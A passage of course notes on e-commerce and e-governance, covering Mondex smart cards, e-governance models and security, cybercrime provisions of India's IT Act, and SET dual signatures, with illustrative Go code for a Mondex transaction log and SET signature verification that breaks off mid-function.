- firewalls in Multos between applications (ITSEC 6 designation)
- transaction data sent to the retailer is deliberately limited
- individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
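An added example in Go (not code from these notes or from Mondex) that models what the text describes: value moves card-to-card offline with no bank in the loop, each card keeps the rolling log of ten transactions mentioned earlier, and once that log overflows the oldest records are overwritten before any ATM or retailer upload can retrieve them. The "lock card" function and the multi-currency check are modelled too; card ids, currency and amounts are constructed values.

```go
package main

import (
	"errors"
	"fmt"
)

// LogCapacity mirrors the "rolling 10 transactions" the text attributes to the card.
const LogCapacity = 10

type Record struct {
	Seq   uint64 // running counter, so a gap reveals lost records
	Peer  string // the other card's id (e.g. a retailer's terminal)
	Cents int64  // positive = value received, negative = value paid
}

// Card is a constructed model of a Mondex purse: the balance lives on the card
// itself, so a transfer needs no bank connection, and the log is a fixed-size
// ring held in the card's limited memory.
type Card struct {
	ID       string
	Currency string
	balance  int64
	locked   bool // the "lock card" function from the text
	seq      uint64
	log      [LogCapacity]Record
	logLen   int
	next     int // ring index that the next record overwrites
	dropped  int // records overwritten before any bank could read them
}

var ErrLocked = errors.New("card is locked")
var ErrInsufficient = errors.New("insufficient value on card")
var ErrCurrency = errors.New("cards hold different currencies")

func NewCard(id, currency string, cents int64) *Card {
	return &Card{ID: id, Currency: currency, balance: cents}
}
func (c *Card) Lock()          { c.locked = true }
func (c *Card) Balance() int64 { return c.balance }

// record appends to the ring; once the ring is full the oldest entry is
// overwritten, which is the overflow the text describes.
func (c *Card) record(peer string, cents int64) {
	c.seq++
	if c.logLen == LogCapacity {
		c.dropped++
	} else {
		c.logLen++
	}
	c.log[c.next] = Record{Seq: c.seq, Peer: peer, Cents: cents}
	c.next = (c.next + 1) % LogCapacity
}

// Transfer moves value card-to-card offline: both cards update their own
// balance and log, and nothing reaches a bank until a card next goes online.
func Transfer(src, dst *Card, cents int64) error {
	if src.locked || dst.locked {
		return ErrLocked
	}
	if src.Currency != dst.Currency {
		return ErrCurrency
	}
	if cents <= 0 || src.balance < cents {
		return ErrInsufficient
	}
	src.balance -= cents
	dst.balance += cents
	src.record(dst.ID, -cents)
	dst.record(src.ID, cents)
	return nil
}

// Records is what an ATM or a retailer upload can still recover: the surviving
// entries, oldest first, plus the count of entries already overwritten.
func (c *Card) Records() ([]Record, int) {
	out := make([]Record, 0, c.logLen)
	start := (c.next - c.logLen + LogCapacity) % LogCapacity
	for i := 0; i < c.logLen; i++ {
		out = append(out, c.log[(start+i)%LogCapacity])
	}
	return out, c.dropped
}

// DemoMondex makes twelve 100-cent purchases from a consumer card to one
// retailer card, then locks the consumer card and tries once more.
func DemoMondex() (consumer, retailer *Card, lockedErr error) {
	consumer = NewCard("card-0001", "GBP", 5000) // constructed ids and values
	retailer = NewCard("shop-0042", "GBP", 0)
	for i := 0; i < 12; i++ {
		if err := Transfer(consumer, retailer, 100); err != nil {
			panic(err) // cannot happen with these constructed amounts
		}
	}
	consumer.Lock()
	return consumer, retailer, Transfer(consumer, retailer, 100)
}

func main() {
	c, r, lockedErr := DemoMondex()
	recs, lost := c.Records()
	fmt.Println("balances:", c.Balance(), r.Balance(), "| kept:", len(recs),
		"oldest kept seq:", recs[0].Seq, "| lost:", lost, "| after lock:", lockedErr)
}
```

After twelve purchases only records 3 to 12 survive on each card; the first two are gone for good, which is the data loss the critics point to.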

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance:

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this definition as congruent with a definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India in PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached that individual. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

- Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.
- Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

- Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
- Generally, but not always, involving:
  - Long Term Contracts
  - User Charges and/or Payments flowing between the Parties
  - Shared Investments, but Mainly Private
  - Risk Sharing by the Parties
- Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

- Fiscal Head Room
- As a Way of Financing the Project
- Separate Policy & Regulation from Operations
- Make the Good or Service Available
- Pay for Performance and Output
- Introduce Competition, For and In the Market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

- Shared goals
- Shared resources (time, money, expertise, people)
- Shared risks
- Shared benefits

Benefits:

- Expedited project completion
- Project cost savings
- Improved quality
- Use of private resources
- Access to new sources of private capital

Two Major Steps:

- Crafting the Partnership
- Implementing the Partnership

Project Management - Six Distinct Phases

1. Genesis
  - What's the need?
  - What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
  - Is there a need for a Public/Private Partnership?
  - Preliminary Project Definition

2. Feasibility
  - Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
  - Market Research
  - Economic/Financial Analysis
  - Program, Budget and Schedule
  - Risk Analysis

3. Plan and Test
  - Final project definition
  - What is the best way to complete the project?
  - Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
  - Master Schedule/Budget
  - Political Climate
  - Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
  - How do you choose and contract with the best-value private partner?
  - What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
  - What do current statutes allow?
  - Procurement Approach: Sole Source, RFP, Low Bid
  - Risk Allocation between Public and Private Partners
  - Structuring of Contract / Risks and Rewards

5. Implement
  - Environmental
  - Design
  - Permitting
  - Construction
  - Commissioning and Administration

6. Operate
  - Startup
  - Monitoring
  - Assessment
  - Enhancement
  - Contract Modifications
  - Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach of an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

• monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

• Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

• Confidentiality: the capability to prevent unauthorized access to information.

• Integrity: the capability to prevent unauthorized modification of information and to ensure that information can be relied upon and is accurate and complete.

• Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units.

• Protecting software applications used to process personal data.

• Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.

• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

• continually improve its control environment;

• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies, and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms, Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 Million Internet Users

• 65 Million Active Internet Users, up by 28% from 51 million in 2010

• 50 Million users shop online on Ecommerce and Online Shopping Sites

• 46+ Million Social Network Users

• 346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer,

• secures access;

• downloads, copies or extracts any data, computer database or any information;

• introduces or causes to be introduced any virus or contaminant;

• disrupts or causes disruption;

• denies or causes denial of access to any person;

• provides any assistance to any person to facilitate access;

• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

• Destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means.

• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device,

• any information that is grossly offensive or has menacing character; or

• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A – Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C – Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and fine up to 2 lakh rupees.

Section 66 – Hacking. Punishment: imprisonment up to three years, or/and fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies, including Visa and MasterCard.

• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality: sensitive messages are encrypted so that they are kept confidential.

– Integrity: nearly all messages are digitally signed to ensure content integrity.

– Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller, which is connected to an acquirer.

• Cardholder: a registered holder of the credit card, who is a buyer.

• Issuer: the bank that issues the credit card to a cardholder.

• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.

• A merchant can process various credit cards through a single acquirer.

• Payment Gateway: this is typically connected to the acquirer.

– The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET Digital Certificate System


Dual signature generation and verification –

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– the cardholder's authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.

How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first finds

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the digital signature with the cardholder's public signature key, as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

• The payment gateway is provided with PI, H[OI] and DS, and verifies the DS in the same way, computing H[PI] itself from the PI it holds.

• By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

• If either the OI or PI is changed, the dual signature will no longer be valid.
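The generation and both verifications described above, as an added example (not code from the original notes): Go's standard-library RSA PKCS#1 v1.5 signatures stand in for the operations the text writes as D_RSA, SHA-256 is assumed for H, and the OI and PI values are constructed.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// H is the hash function of the dual signature; the notes leave H abstract, SHA-256 is an
// assumption. H(a, b) computes H[a || b], the concatenation hashed as one message.
func H(parts ...[]byte) []byte {
	h := sha256.New()
	for _, p := range parts {
		h.Write(p)
	}
	return h.Sum(nil)
}

// DualSign produces DS = E_RSA[ H[ H[PI] || H[OI] ] | key_private_sign,cardholder ].
// SignPKCS1v15 is given the already computed digest, so the signed value is exactly the
// combined hash described in the text (wrapped in a PKCS#1 v1.5 DigestInfo).
func DualSign(priv *rsa.PrivateKey, pi, oi []byte) ([]byte, error) {
	return rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, H(H(pi), H(oi)))
}

// verifyDS is Steps 1 to 3 of the notes: rebuild H[H[PI] || H[OI]] from the two hashes the
// verifier holds, "decrypt" DS with the cardholder's public signature key and compare.
// VerifyPKCS1v15 performs the decrypt-and-compare internally and returns nil on a match.
func verifyDS(pub *rsa.PublicKey, hPI, hOI, ds []byte) bool {
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, H(hPI, hOI), ds) == nil
}

// MerchantVerify: the merchant receives OI in clear, only H[PI] (never the PI) and DS.
func MerchantVerify(pub *rsa.PublicKey, oi, hPI, ds []byte) bool {
	return verifyDS(pub, hPI, H(oi), ds)
}

// GatewayVerify: the payment gateway receives PI in clear, only H[OI] (never the OI) and DS.
func GatewayVerify(pub *rsa.PublicKey, pi, hOI, ds []byte) bool {
	return verifyDS(pub, H(pi), hOI, ds)
}

// ScenarioResult records the outcome of one constructed transaction.
type ScenarioResult struct {
	MerchantOK   bool // genuine OI, H[PI], DS
	GatewayOK    bool // genuine PI, H[OI], DS
	TamperedOIOK bool // merchant sees an altered OI; must be false
	TamperedPIOK bool // gateway sees an altered PI; must be false
}

// RunScenario generates a cardholder signature key, dual-signs constructed OI and PI, runs
// both verifications, then shows that changing either OI or PI invalidates the DS.
func RunScenario() (ScenarioResult, error) {
	var res ScenarioResult
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return res, err
	}
	pub := &priv.PublicKey

	// Constructed sample messages; PAN-PLACEHOLDER stands in for a card number.
	oi := []byte(`{"order":"ORD-0001","item":"textbook","amount":"499.00"}`)
	pi := []byte(`{"pan":"PAN-PLACEHOLDER","exp":"12/29","amount":"499.00"}`)

	ds, err := DualSign(priv, pi, oi)
	if err != nil {
		return res, err
	}

	// Each party receives only the hash of the message it must not see.
	res.MerchantOK = MerchantVerify(pub, oi, H(pi), ds)
	res.GatewayOK = GatewayVerify(pub, pi, H(oi), ds)

	// Integrity check: an altered amount in OI or PI no longer matches the signed hash.
	tamperedOI := bytes.Replace(oi, []byte("499.00"), []byte("4.99"), 1)
	res.TamperedOIOK = MerchantVerify(pub, tamperedOI, H(pi), ds)
	tamperedPI := bytes.Replace(pi, []byte("499.00"), []byte("999.00"), 1)
	res.TamperedPIOK = GatewayVerify(pub, tamperedPI, H(oi), ds)
	return res, nil
}

func main() {
	res, err := RunScenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("merchant verifies genuine DS: %v\n", res.MerchantOK)
	fmt.Printf("gateway verifies genuine DS:  %v\n", res.GatewayOK)
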